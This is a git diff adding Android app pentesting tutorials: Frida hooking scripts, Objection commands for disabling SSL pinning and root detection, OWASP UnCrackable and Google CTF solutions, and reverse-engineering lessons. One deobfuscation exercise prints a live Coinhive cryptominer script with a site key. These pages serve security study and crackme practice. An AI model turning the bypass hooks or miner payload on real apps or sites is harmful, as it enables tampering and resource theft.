+                onComplete: function () { }
+
+            });
+        }
+        else {//else if the array has some values
+            console.log("Result of secret func: " + instances_array[0].secret());
+        }
+
+    });
+}
+
+function hookSecret() {
+    Java.perform(function () {
+        var my_class = Java.use("com.example.a11x256.frida_test.my_activity");
+        var string_class = Java.use("java.lang.String");
+        my_class.secret.overload().implementation = function(){
+            var my_string = string_class.$new("THIS IS FAKE BB");
+            return my_string;
+        }
+    });
+}
+rpc.exports = {
+    callsecretfunction: callSecretFun,
+    hooksecretfunction: hookSecret
+};
+```
+
+## Part 4
+
+Here you will see how to make **Python and JS interact** using JSONs objects. JS use the `send()` function to send data to the python cliente, and Python uses `post()` functions to send data to ths JS script. The **JS will block the execution** until is receives s response from Python.
+
+### Python
+
+```python
+//loader.py
+import time
+import frida
+
+def my_message_handler(message, payload):
+    print message
+    print payload
+    if message["type"] == "send":
+        print message["payload"]
+        data = message["payload"].split(":")[1].strip()
+        print 'message:', message
+        data = data.decode("base64")
+        user, pw = data.split(":")
+        data = ("admin" + ":" + pw).encode("base64")
+        print "encoded data:", data
+        script.post({"my_data": data})  # send JSON object
+        print "Modified data sent"
+
+
+device = frida.get_usb_device()
+pid = device.spawn(["com.example.a11x256.frida_test"])
+device.resume(pid)
+time.sleep(1)
+session = device.attach(pid)
+with open("s4.js") as f:
+    script = session.create_script(f.read())
+script.on("message", my_message_handler)  # register the message handler
+script.load()
+raw_input()
+```
+
+### JS
+
+```javascript
+console.log("Script loaded successfully ");
+Java.perform(function () {
+    var tv_class = Java.use("android.widget.TextView");
+    tv_class.setText.overload('java.lang.CharSequence').implementation = function (x) {
+        var string_to_send = x.toString();
+        var string_to_recv = "";
+        send(string_to_send); // send data to python code
+        recv(function (received_json_object) {
+            string_to_recv = received_json_object.my_data;
+        }).wait(); //block execution till the message is received
+        console.log("Final string_to_recv: "+ string_to_recv)
+        return this.setText(string_to_recv);
+    }
+});
+```
+
+
+
+There is a part 5 that I am not going to explain because there isn't anything new. But if you want to read it is here: [https://11x256.github.io/Frida-hooking-android-part-5/](https://11x256.github.io/Frida-hooking-android-part-5/)
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
new file mode 100644
index 00000000..352da4a0
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/objection-tutorial.md
@@ -0,0 +1,275 @@
+# Objection Tutorial
+
+## **Introduction**
+
+[![objection](https://github.com/sensepost/objection/raw/master/images/objection.png)](https://github.com/sensepost/objection)  
+
+
+**objection - Runtime Mobile Exploration**
+
+`objection` is a runtime mobile exploration toolkit, powered by [Frida](https://www.frida.re/). It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device.
+
+**Note:** This is not some form of jailbreak / root bypass. By using `objection`, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing.
+
+### Resume
+
+The **goal** of **objection** is let the user call the **main actions that offers Frida**. **Otherwise**, the user will need to create a **single script for every application** that he wants to test.
+
+## Tutorial
+
+For this tutorial I am going to use the APK that you can download here:
+
+{% file src="../../../.gitbook/assets/app-release.zip" %}
+
+Or from its [original repository ](https://github.com/asvid/FridaApp)\(download app-release.apk\)
+
+### Installation
+
+```text
+pip3 install objection
+```
+
+### Connection
+
+Make a **regular ADB conection** and **start** the **frida** server in the device \(and check that frida is working in both the client and the server\).
+
+If you are using a **rooted device** it is needed to select the application that you want to test inside the _**--gadget**_ option. in this case:
+
+```text
+objection --gadget asvid.github.io.fridaapp explore
+```
+
+### Basic Actions
+
+Not all possible commands of objections are going to be listed in this tutorial, only the ones that I have found more useful.
+
+#### Environment
+
+Some interesting information \(like passwords or paths\) could be find inside the environment.
+
+```text
+env
+```
+
+![](../../../.gitbook/assets/image%20%28321%29.png)
+
+#### Frida Information
+
+```text
+frida
+```
+
+![](../../../.gitbook/assets/image%20%28326%29.png)
+
+#### Upload/Download
+
+```text
+file download <remote path> [<local path>]
+file upload <local path> [<remote path>]
+```
+
+#### Import frida script
+
+```text
+import <local path frida-script>
+```
+
+#### SSLPinning
+
+```text
+android sslpinning disable #Attempts to disable SSL Pinning on Android devices.
+```
+
+#### Root detection
+
+```text
+android root disable  #Attempts to disable root detection on Android devices.
+android root simutale #Attempts to simulate a rooted Android environment.
+```
+
+#### Exec Command
+
+```text
+android shell_exec whoami
+```
+
+#### Screenshots
+
+```text
+android ui screenshot /tmp/screenshot
+android ui FLAG_SECURE false  This may enable you to take screenshots using the hardware keys
+```
+
+### Static analysis made Dynamic
+
+In a real application we should know all of the information discovered in this part before using objection thanks to **static analysis**. Anyway, this way maybe you can see **something new** as here you will only have a complete list of classes, methods and exported objects.
+
+This is also usefull if somehow you are **unable to get some readable source code** of the app.
+
+#### List activities, receivers and services
+
+```text
+android hooking list activities
+```
+
+![](../../../.gitbook/assets/image%20%2866%29.png)
+
+```text
+android hooking list services
+android hooking list receivers
+```
+
+Frida will launch an error if none is found
+
+#### Getting current activity
+
+```text
+android hooking get current_activity
+```
+
+![](../../../.gitbook/assets/image%20%2878%29.png)
+
+#### Search Classes
+
+Lets start looking for classes inside our application
+
+```text
+android hooking search classes asvid.github.io.fridaapp
+```
+
+![](../../../.gitbook/assets/image%20%2843%29.png)
+
+#### Search Methods of a class
+
+Now lets extract the methods inside the class _MainActivity:_
+
+```text
+android hooking search methods asvid.github.io.fridaapp MainActivity 
+```
+
+![](../../../.gitbook/assets/image%20%286%29.png)
+
+#### List declared Methods of a class with their parameters
+
+Lets figure out wich parameters does the methods of the class need:
+
+```text
+android hooking list class_methods asvid.github.io.fridaapp.MainActivity
+```
+
+![](../../../.gitbook/assets/image%20%28213%29.png)
+
+#### List classes
+
+You could also list all the classes that were loaded inside the current applicatoin:
+
+```text
+android hooking list classes #List all loaded classes, As the target application gets usedmore, this command will return more classes.
+```
+
+This is very useful if you want to **hook the method of a class and you only know the name of the class**. You coul use this function to **search which module owns the class** and then hook its method.
+
+### Hooking being easy
+
+#### Hooking \(watching\) a method
+
+From the [source code](https://github.com/asvid/FridaApp/blob/master/app/src/main/java/asvid/github/io/fridaapp/MainActivity.kt) of the application we know that the **function** _**sum\(\)**_ **from** _**MainActivity**_ is being run **every second**. Lets try to **dump all possible information** each time the function is called \(arguments, return value and backtrace\):
+
+```text
+android hooking watch class_method asvid.github.io.fridaapp.MainActivity.sum --dump-args --dump-backtrace --dump-return
+```
+
+![](../../../.gitbook/assets/image%20%28310%29.png)
+
+#### Hooking \(watching\) an entire class
+
+Actually I find all the methods of the class MainActivity really interesting, lets **hook them all**. Be careful, this could **crash** an application.
+
+```text
+android hooking watch class asvid.github.io.fridaapp.MainActivity --dump-args --dump-return
+```
+
+If you play with the application while the class is hooked you will see when **each function is being called**, its **arguments** and the **return** value.
+
+![](../../../.gitbook/assets/image%20%2838%29.png)
+
+#### Changing boolean return value of a function
+
+From the source code you can see that the function _checkPin_ gets a _String_ as argument and returns a _boolean_. Lets make the function **always return true**:
+
+![](../../../.gitbook/assets/image%20%28128%29.png)
+
+Now, If you write anything in the text box for the PIN code you will see tat anything is valid:
+
+![](../../../.gitbook/assets/image%20%28205%29.png)
+
+### Class instances
+
+Search for and print **live instances of a specific Java class**, specified by a fully qualified class name. Out is the result of an attempt at getting a string value for a discovered objection which would typically **contain property values for the object**.
+
+```text
+android heap print_instances <class>
+```
+
+![](../../../.gitbook/assets/image%20%28223%29.png)
+
+### Keystore/Intents
+
+You can play with the keystore and intents using:
+
+```text
+android keystore list
+android intents launch_activity
+android intent launch_service
+```
+
+### Memory
+
+#### Dump
+
+```text
+memory dump all <local destination> #Dump all memory
+memory dump from_base <base_address> <size_to_dump> <local_destination> #Dump a part
+```
+
+#### List
+
+```text
+memory list modules
+```
+
+![](../../../.gitbook/assets/image%20%28222%29.png)
+
+At the bottom os the list you can see frida:
+
+![](../../../.gitbook/assets/image%20%2846%29.png)
+
+Lets checks what is frida exporting:
+
+![](../../../.gitbook/assets/image%20%28113%29.png)
+
+#### Search/Write
+
+You can alse search and write inside memory with objection:
+
+```text
+memory search "<pattern eg: 41 41 41 ?? 41>" (--string) (--offsets-only)
+memory write "<address>" "<pattern eg: 41 41 41 41>" (--string)
+```
+
+### SQLite
+
+You cals can use the command `sqlite` to interact with sqlite databases.
+
+### Exit
+
+```text
+exit
+```
+
+## What I miss in Objection
+
+* The hooking methods sometimes crashes the application \(this is also because of Frida\).
+* You can't use the instaces of the classes to call functions of the instance. And you can't create new instances of classes and use them to call functions.
+* There isn't a shortcut \(like the one for sslpinnin\) to hook all the common crypto methods being used by the application to see cyphered text, plain text, keys, IVs and algorithms used.
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
new file mode 100644
index 00000000..29c7178b
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/frida-tutorial/owaspuncrackable-1.md
@@ -0,0 +1,110 @@
+# Frida Tutorial 3
+
+**From**: [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1)  
+**APK**: [https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level\_01/UnCrackable-Level1.apk](https://github.com/OWASP/owasp-mstg/blob/master/Crackmes/Android/Level_01/UnCrackable-Level1.apk)
+
+## Solution 1 
+
+Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) 
+
+**Hook the** _**exit\(\)**_ function and **decrypt function** so it print the flag in frida console when you press verify:
+
+```javascript
+Java.perform(function () {
+  send("Starting hooks OWASP uncrackable1...");
+
+  function getString(data){
+    var ret = "";
+    for (var i=0; i < data.length; i++){
+        ret += "#" + data[i].toString();
+      }
+    return ret
+  } 
+
+  var aes_decrypt = Java.use("sg.vantagepoint.a.a");
+  aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) {
+    send("sg.vantagepoint.a.a.a([B[B)[B   doFinal(enc)  // AES/ECB/PKCS7Padding");
+    send("Key       : " + getString(var_0));
+    send("Encrypted : " + getString(var_1));
+    var ret = this.a.overload("[B","[B").call(this,var_0,var_1);
+    send("Decrypted : " + getString(ret));
+
+    var flag = "";
+    for (var i=0; i < ret.length; i++){
+      flag += String.fromCharCode(ret[i]);
+    }
+    send("Decrypted flag: " + flag);
+    return ret; //[B
+  };
+
+  var sysexit = Java.use("java.lang.System");
+  sysexit.exit.overload("int").implementation = function(var_0) {
+    send("java.lang.System.exit(I)V  // We avoid exiting the application  :)");
+  };
+
+  send("Hooks installed.");
+});
+```
+
+## Solution 2
+
+Based in [https://joshspicer.com/android-frida-1](https://joshspicer.com/android-frida-1) 
+
+**Hook rootchecks** and decrypt function so it print the flag in frida console when you press verify:
+
+```javascript
+Java.perform(function () {
+  send("Starting hooks OWASP uncrackable1...");
+
+  function getString(data){
+    var ret = "";
+    for (var i=0; i < data.length; i++){
+        ret += "#" + data[i].toString();
+      }
+    return ret
+  } 
+
+  var aes_decrypt = Java.use("sg.vantagepoint.a.a");
+  aes_decrypt.a.overload("[B","[B").implementation = function(var_0,var_1) {
+    send("sg.vantagepoint.a.a.a([B[B)[B   doFinal(enc)  // AES/ECB/PKCS7Padding");
+    send("Key       : " + getString(var_0));
+    send("Encrypted : " + getString(var_1));
+    var ret = this.a.overload("[B","[B").call(this,var_0,var_1);
+    send("Decrypted : " + getString(ret));
+
+    var flag = "";
+    for (var i=0; i < ret.length; i++){
+      flag += String.fromCharCode(ret[i]);
+    }
+    send("Decrypted flag: " + flag);
+    return ret; //[B
+  };
+
+  var rootcheck1 = Java.use("sg.vantagepoint.a.c");
+  rootcheck1.a.overload().implementation = function() {
+    send("sg.vantagepoint.a.c.a()Z   Root check 1 HIT!  su.exists()");
+    return false;
+  };
+
+  var rootcheck2 = Java.use("sg.vantagepoint.a.c");
+  rootcheck2.b.overload().implementation = function() {
+    send("sg.vantagepoint.a.c.b()Z  Root check 2 HIT!  test-keys");
+    return false;
+  };
+
+  var rootcheck3 = Java.use("sg.vantagepoint.a.c");
+  rootcheck3.c.overload().implementation = function() {
+    send("sg.vantagepoint.a.c.c()Z  Root check 3 HIT!  Root packages");
+    return false;
+  };
+
+  var debugcheck = Java.use("sg.vantagepoint.a.b");
+  debugcheck.a.overload("android.content.Context").implementation = function(var_0) {
+    send("sg.vantagepoint.a.b.a(Landroid/content/Context;)Z  Debug check HIT! ");
+    return false;
+  };
+
+  send("Hooks installed.");
+});
+```
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
new file mode 100644
index 00000000..06373916
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/google-ctf-2018-shall-we-play-a-game.md
@@ -0,0 +1,68 @@
+# Google CTF 2018 - Shall We Play a Game?
+
+Download the APK here:
+
+I am going to upload the APK to [https://appetize.io/](https://appetize.io/) \(free account\) to see how the apk is behaving:
+
+![](../../.gitbook/assets/image%20%28322%29.png)
+
+Looks like you need to win 1000000 times to get the flag.
+
+Following the steps from [pentesting Android](./) you can decompile the application to get the smali code and read the Java code using jadx.
+
+Reading the java code:
+
+![](../../.gitbook/assets/image%20%28262%29.png)
+
+It looks like the function that is going print the flag is **m\(\).** 
+
+## **Smali changes**
+
+### **Call m\(\) the first time**
+
+Lets make the application call m\(\) if the variable _this.o != 1000000_ to do so, just cange the condition:
+
+```text
+ if-ne v0, v9, :cond_2 
+```
+
+to:
+
+```text
+ if-eq v0, v9, :cond_2 
+```
+
+![Before](../../.gitbook/assets/image%20%28204%29.png)
+
+![After](../../.gitbook/assets/image%20%28329%29.png)
+
+Follow the steps of [pentest Android](./) to recompile and sign the APK. Then, upload it to [https://appetize.io/](https://appetize.io/) and lets see what happens:
+
+![](../../.gitbook/assets/image%20%28284%29.png)
+
+Looks like the flag is written without being completely decrypted. Probably the m\(\) function should be called 1000000 times.
+
+**Other way** to do this is to not change the instrucction but change the compared instructions:
+
+![](../../.gitbook/assets/image%20%28167%29.png)
+
+**Another way** is instead of comparing with 1000000, set the value to 1 so this.o is compared with 1:
+
+![](../../.gitbook/assets/image%20%2811%29.png)
+
+A forth way is to add an instruction to move to value of v9\(1000000\) to v0 _\(this.o\)_:
+
+![](../../.gitbook/assets/image%20%28115%29.png)
+
+
+
+![](../../.gitbook/assets/image%20%28238%29.png)
+
+## Solution
+
+Make the application run the loop 100000 times when you win the first time. To do so, you only need to create the **:goto\_6** loop and make the application **junp there if** _**this.o**_ **does not value 100000**:
+
+![](../../.gitbook/assets/image%20%28102%29.png)
+
+You need to do this inside a physical device as \(I don't know why\) this doesn't work in an emulated device.
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/manual-deobfuscation.md b/mobile-apps-pentesting/android-app-pentesting/manual-deobfuscation.md
new file mode 100644
index 00000000..432fdb15
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/manual-deobfuscation.md
@@ -0,0 +1,93 @@
+# Manual DeObfuscation
+
+**Copied from** [**https://maddiestone.github.io/AndroidAppRE/obfuscation.html**](https://maddiestone.github.io/AndroidAppRE/obfuscation.html) **\(you can find solutions there\)**
+
+![Logo](https://maddiestone.github.io/AndroidAppRE/images/pinkandroid.png)
+
+There are many times when the application you’re reversing will not be as straight forward as some of the examples we’ve discussed. The developer will implement one or more obfuscation techniques to hide the behavior and/or implementation of their app. This can be for both benign and malicious reasons.
+
+The key about obfuscation to remember is that if you want to de-obfuscate it, you will be able to. The key decision is not whether or not you can, but whether or not it’s worth the resources to de-obfuscate.
+
+The reason that you can always de-obfuscate something is because ultimately the CPU at some point has to see the unobfuscated code in order to run it.
+
+### How to De-Obfuscate <a id="how-to-de-obfuscate"></a>
+
+How you choose to de-obfuscate the application will depend on the obfuscation method, but there are a couple of common techniques that usually work well. Here, we will only touch on the static de-obfuscation techniques since this workshop only covers static analysis/reversing. However, do remember that running the application and dynamically analyzing it can be another great way to get around obfuscation.
+
+For obfuscation in the DEX bytecode \(Java\), one of the easiest ways to statically deobfuscate is to identify the de-obfuscation methods in the application and copy their decompilation into a Java file that you then run on the obfuscated file, strings, code, etc.
+
+Another solution for both Java and Native Code is to transliterate the de-obfuscation algorithm into Python or any other scripting language that you’re most comfortable. I say “transliterate” because it’s important to remember that you don’t always need to \*understand\* the de-obfuscation algorithm, you just need a way to execute it. I cover this in more detail in the “Unpacking the Packed Unpacker” talk that is linked in the “More Examples” section.
+
+### Indicators of Obfuscation <a id="indicators-of-obfuscation"></a>
+
+There are many different types of obfuscation and thus, just as many different types of indicators to alert you as the analyst that an application is likely obfuscated, but here are a few examples with proposed static analysis solutions for deobfuscating.
+
+* No strings: Java and Android are highly dependent on strings so if you don’t see any or only scrambled strings, it’s highly likely the strings are obfuscated.
+  * Suggested solution: Look for method calls that take strings as an argument and trace back where that argument is coming from. At some point the string argument will be going through a deobfuscation method before it’s passed to the API that takes the String argument.
+* Scrambled strings: The Java and Android APIs require the plain text strings, not scrambled.
+  * Suggested solution: The scrambled strings are all likely passed to the same methods prior to being passed to the APIs. These methods are likely the deobfuscation methods.
+* Binary files in the assets/ directory and DexClassLoader calls in the app: Likely unpacking and loading additional code. \(Could also be downloading from a remote location and then loading using DexClassLoader\)
+  * Suggestion Solution: Identify where the file is read and then follow the path. It is likely deobfuscated quickly after being read.
+* Native libraries - Can’t identify the JNI functions \(no funcs named Java\_ and no calls to RegisterNatives\): In order to execute any native methods, JNI has to be able to pair the function in the native library with the native method declaration in Java and thus one of the two must exist at some point.
+  * Suggested Solution: Start at JNI\_OnLoad method and look for a de-obfuscation routine that loads additional code.
+
+### Exercise 7 - String Deobfuscation <a id="exercise-7---string-deobfuscation"></a>
+
+In this exercise, we will practice de-obfuscating strings in order to analyze an application. For the exercise we will use the sample at `~/samples/ClashOfLights.apk` in the VM. This sample has the SHA256 digest c403d2dcee37f80b6d51ebada18c409a9eae45416fe84cd0c1ea1d9897eae4e5.
+
+#### Goals <a id="goals"></a>
+
+To identify obfuscated strings and develop a solution to deobfuscate it.
+
+#### Exercise Context <a id="exercise-context"></a>
+
+You are a malware analyst reviewing this application to determine if it’s malware. You come across an obfuscated Javascript string that is being loaded and need to deobfuscate it to determine whether or not the application is malicious. You can’t run the application dynamically and need to determine what the Javascript is statically.
+
+#### Instructions <a id="instructions"></a>
+
+1. Find the string that you need to de-obfuscate
+2. Identify the routine that de-obfuscates it.
+3. Determine how you want to write a solution to de-obfuscate the string.
+4. Do it :\)
+
+#### Solution <a id="solution"></a>
+
+The deobfuscated string is:
+
+```text
+<script src="https://coinhive.com/lib/coinhive.min.js"></script><script>var miner = new CoinHive.Anonymous('nf24ZwEMmu0m1X6MgcOv48AMsIYErpFE', {threads: 2});miner.start();</script>
+```
+
+The Python script I wrote to de-obfuscate it is:
+
+```text
+enc_str = "773032205849207A3831326F1351202E3B306B7D1E5A3B33252B382454173735266C3D3B53163735222D393B475C7A37222D7F38421B6A66643032205849206477303220584920643D2223725C503A3F39636C725F5C237A082C383C7950223F65023F3D5F4039353E3079755F5F666E1134141F5C4C64377A1B671F565A1B2C7F7B101F42700D1F39331717161574213F2B2337505D27606B712C7B0A543D342E317F214558262E636A6A6E1E4A37282233256C"
+
+length = len(enc_str)
+count = 0
+dec_str = [0] * (length/2)
+while (count < length):
+    dec_str[count/2] = (int(enc_str[count], 16) << 4) + int(enc_str[count + 1], 16) & 0xFF
+    count += 2
+print dec_str
+
+
+key = [75, 67, 81, 82, 49, 57, 84, 90]
+enc_str = dec_str
+count = 0
+length = len(enc_str)
+while (count < length):
+    dec_str[count] = chr(enc_str[count] ^ key[count % len(key)])
+    count += 1
+print ''.join(dec_str)
+```
+
+### More Examples <a id="more-examples"></a>
+
+I have done a few talks on de-obfuscating Android apps that include a variety of obfuscation mechanisms. In these talks, I discuss the advanced obfuscation techniques, my solution to de-obfuscate them, and the considerations and choices I made when deciding how I wanted to deobfuscate.
+
+* BlackHat USA 2018: “Unpacking the Packed Unpacker: Reverse Engineering an Android Anti-Analysis Library” \[[video](https://www.youtube.com/watch?v=s0Tqi7fuOSU)\]
+  * This talk goes over reverse engineering one of the most complex anti-analysis native libraries I’ve seen used by an Android application. It covers mostly obfuscation techniques in native code.
+* REcon 2019: “The Path to the Payload: Android Edition” \[[video](https://recon.cx/media-archive/2019/Session.005.Maddie_Stone.The_path_to_the_payload_Android_Edition-J3ZnNl2GYjEfa.mp4)\]
+  * This talk discusses a series of obfuscation techniques, solely in Java code, that an Android botnet was using to hide its behavior.
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-apps-pentesting/android-app-pentesting/reversing-native-libraries.md
new file mode 100644
index 00000000..17c012ca
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/reversing-native-libraries.md
@@ -0,0 +1,281 @@
+# Reversing Native Libraries
+
+**Information copied from** [**https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html**](https://maddiestone.github.io/AndroidAppRE/reversing_native_libs.html) **\(you can find solutions there\)**
+
+Android applications can contain compiled, native libraries. Native libraries are code that the developer wrote and then compiled for a specific computer architecture. Most often, this means code that is written in C or C++. The benign, or legitimate, reasons a developer may do this is for mathematically intensive or time sensitive operations, such as graphics libraries. Malware developers have begun moving to native code because reverse engineering compiled binaries tends to be a less common skillset than analyzing DEX bytecode. This is largely due to DEX bytecode can be decompiled to Java whereas native, compiled code, often must be analyzed as assembly.
+
+### Goal
+
+The goal of this section is not to teach you assembly \(ASM\) or how to reverse engineer compiled code more generally, but instead how to apply the more general binary reverse engineering skills, specifically to Android. Because the goal of this workshop is not to teach you the ASM architectures, all exercises will include an ARM _and_ an x86 version of the library to be analyzed so that each person can choose the architecture that they are more comfortable with.
+
+#### Learning ARM Assembly <a id="learning-arm-assembly"></a>
+
+If you don’t have previous binary reverse engineering/ assembly experience, here are some suggested resources. Most Android devices run on ARM, but all exercises in this workshop also include an x86 version of the library.
+
+To learn and/or review ARM assembly, I highly suggest the [ARM Assembly Basics](https://azeria-labs.com/writing-arm-assembly-part-1/) from [Azeria Labs](https://azeria-labs.com/).
+
+### Introduction to the Java Native Interface \(JNI\) <a id="introduction-to-the-java-native-interface-jni"></a>
+
+The Java Native Interface \(JNI\) allows developers to declare Java methods that are implemented in native code \(usually compiled C/C++\). JNI interface is not Android-specific, but is available more generally to Java applications that run on different platforms.
+
+The Android Native Development Kit \(NDK\) is the Android-specific toolset on top of JNI. According to the [docs](https://developer.android.com/ndk/guides):
+
+> In Android, the Native Development Kit \(NDK\) is a toolset that permits developers to write C and C++ code for their Android apps.
+
+Together, JNI and NDK allow Android developers to implement some of their app’s functionality in native code. The Java \(or Kotlin\) code will call a Java-declared native method which is implemented in the compiled, native library.
+
+#### References <a id="references"></a>
+
+**Oracle JNI Docs**
+
+* [JNI Specification](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/jniTOC.html)
+* [JNI Functions](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html) &lt;– I always have this one open and refer to it while reversing Android native libraries
+
+**Android JNI & NDK References**
+
+* [Android JNI Tips](https://developer.android.com/training/articles/perf-jni) &lt;– Highly suggest reading the “Native Libraries” section to start
+* [Getting Started with the NDK](https://developer.android.com/ndk/guides/) &lt;– This is guidance for how developers develop native libraries and understanding how things are built, makes it easier to reverse.
+
+### Target of Analysis - Android Native Libraries <a id="target-of-analysis---android-native-libraries"></a>
+
+For this section, we are focusing on how to reverse engineer app functionality that has been implemented in Android native libraries. When we say Android native libraries, what do we mean?
+
+Android native libraries are included in APKs as `.so`, shared object libraries, in the ELF file format. If you have analyzed Linux binaries previously, it’s the same format.
+
+These libraries by default are included in the APK at the file path `/lib/<cpu>/lib<name>.so`. This is the default path, but developers could also choose to include the native library in `/assets/<custom_name>` if they so choose. More often, we are seeing malware developers choose to include native libraries in paths other than `/lib` and using different file extensions to attempt to “hide” the presence of the native library.
+
+Because native code is compiled for specific CPUs, if a developer wants their app to run on more than 1 type of hardware, they have to include each of those versions of the compiled, native library in the application. The default path mentioned above, includes a directory for each cpu type officially supported by Android.
+
+| CPU | Native Library Path |
+| :--- | :--- |
+| “generic” 32-bit ARM | `lib/armeabi/libcalc.so` |
+| x86 | `lib/x86/libcalc.so` |
+| x64 | `lib/x86_64/libcalc.so` |
+| ARMv7 | `lib/armeabi-v7a/libcalc.so` |
+| ARM64 | `lib/arm64-v8a/libcalc.so` |
+
+### Loading the Library <a id="loading-the-library"></a>
+
+Before an Android app can call and execute any code that is implemented in a native library, the application \(Java code\) must load the library into memory. There are two different API calls that will do this:
+
+```text
+System.loadLibrary("calc")
+```
+
+or
+
+```text
+System.load("lib/armeabi/libcalc.so")
+```
+
+The difference between the two api calls is that `loadLibrary` only take takes the library short name as an argument \(ie. libcalc.so = “calc” & libinit.so = “init”\) and the system will correctly determine the architecture it’s currently running on and thus the correct file to use. On the other hand, `load` requires the full path to the library. This means that the app developer has to determine the architecture and thus the correct library file to load themselves.
+
+When either of these two \(`loadLibrary` or `load`\) APIs are called by the Java code, the native library that is passed as an argument executes its `JNI_OnLoad` if it was implemented in the native library.
+
+To reiterate, before executing any native methods, the native library has to be loaded by calling `System.loadLibrary` or `System.load` in the Java code. When either of these 2 APIs is executed, the `JNI_OnLoad` function in the native library is also executed.
+
+### The Java to Native Code Connection <a id="the-java-to-native-code-connection"></a>
+
+In order to execute a function from the native library, there must be a Java-declared native method that the Java code can call. When this Java-declared native method is called, the “paired” native function from the native library \(ELF/.so\) is executed.
+
+A Java-declared native method appears in the Java code as below. It appears like any other Java method, except it includes the `native` keyword and has no code in its implementation, because its code is actually in the compiled, native library.
+
+```text
+public native String doThingsInNativeLibrary(int var0);
+```
+
+To call this native method, the Java code would call it like any other Java method. However, in the backend, the JNI and NDK would instead execute the corresponding function in the native library. To do this, it must know the pairing between a Java-declared native method with a function in the native library.
+
+There are 2 different ways to do this pairing, or linking:
+
+1. Dynamic Linking using JNI Native Method Name Resolving, or
+2. Static Linking using the `RegisterNatives` API call
+
+#### Dynamic Linking <a id="dynamic-linking"></a>
+
+In order to link, or pair, the Java declared native method and the function in the native library dynamically, the developer names the method and the function according to the specs such that the JNI system can dynamically do the linking.
+
+According to the spec, the developer would name the function as follow for the system to be able to dynamically link the native method and function. A native method name is concatenated from the following components:
+
+1. the prefix Java\_
+2. a mangled fully-qualified class name
+3. an underscore \(“\_”\) separator
+4. a mangled method name
+5. for overloaded native methods, two underscores \(“\_\_”\) followed by the mangled argument signature
+
+In order to do dynamic linking for the Java-declared native method below and let’s say it’s in the class `com.android.interesting.Stuff`
+
+```text
+public native String doThingsInNativeLibrary(int var0);
+```
+
+The function in the native library would need to be named:
+
+```text
+Java_com_android_interesting_Stuff_doThingsInNativeLibrary
+```
+
+If there is not a function in the native library with that name, that means that the application must be doing static linking.
+
+#### Static Linking <a id="static-linking"></a>
+
+If the developer doesn’t want to or can not name the native functions according to the spec \(Ex. wants to strip debug symbols\), then they must use static linking with the `RegisterNatives` \([doc](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/functions.html#wp5833)\) API in order to do the pairing between the Java-declared native method and the function in the native library. The `RegisterNatives` function is called from the native code, not the Java code and is most often called in the `JNI_OnLoad` function since `RegisterNatives` must be executed prior to calling the Java-declared native method.
+
+```text
+jint RegisterNatives(JNIEnv *env, jclass clazz, const JNINativeMethod *methods, jint nMethods);
+
+typedef struct { 
+    char *name; 
+    char *signature; 
+    void *fnPtr; 
+} JNINativeMethod;
+```
+
+When reverse engineering, if the application is using the static linking method, we as analysts can find the `JNINativeMethod` struct that is being passed to `RegisterNatives` in order to determine which subroutine in the native library is executed when the Java-declared native method is called.
+
+The `JNINativeMethod` struct requires a string of the Java-declared native method name and a string of the method’s signature, so we should be able to find these in our native library.
+
+**Method Signature**
+
+The `JNINativeMethod` struct requires the method signature. A method signature states the types of the arguments that the method takes and the type of what it returns. This link documents [JNI Type Signatures](https://docs.oracle.com/javase/7/docs/technotes/guides/jni/spec/types.html) in the “Type Signatures” section.
+
+* Z: boolean
+* B: byte
+* C: char
+* S: short
+* I: int
+* J: long
+* F: float
+* D: double
+* L fully-qualified-class ; :fully-qualified-class
+* \[ type: type\[\]
+* \( arg-types \) ret-type: method type
+* V: void
+
+For the native method
+
+```text
+public native String doThingsInNativeLibrary(int var0);
+```
+
+The type signature is
+
+```text
+(I)Ljava/lang/String;
+```
+
+Here’s another example of a native method and its signature. For the following is the method declaration
+
+```text
+public native long f (int n, String s, int[] arr); 
+```
+
+It has the type signature:
+
+```text
+(ILjava/lang/String;[I)J
+```
+
+#### Exercise \#5 - Find the Address of the Native Function <a id="exercise-5---find-the-address-of-the-native-function"></a>
+
+In Exercise \#5 we’re going to learn to load native libraries in a disassembler and identify the native function that is executed when a native method is called. For this particular exercise, the goal is not to reverse engineer the native method, just to find the link between the call to the native method in Java and the function that is executed in the native library. For this exercise, we will be using the sample Mediacode.apk. This sample is available at `~/samples/Mediacode.apk` in the VM. Its SHA256 hash is a496b36cda66aaf24340941da8034bd53940d1b08d83a97f17a65ae144ebf91a.
+
+**Goal**
+
+The goal of this exercise is to:
+
+1. Identify declared native methods in the DEX bytecode
+2. Determine what native libraries are loaded \(and thus where the native methods may be implemented\)
+3. Extract the native library from the APK
+4. Load the native library into a disassembler
+5. Identify the address \(or name\) of the function in the native library that is executed when the native method is called
+
+**Instructions**
+
+1. Open Mediacode.apk in jadx. Refer back to [Exercise \#1](https://maddiestone.github.io/AndroidAppRE/reversing_intro.html#exercise-1---beginning-re-with-jadx)
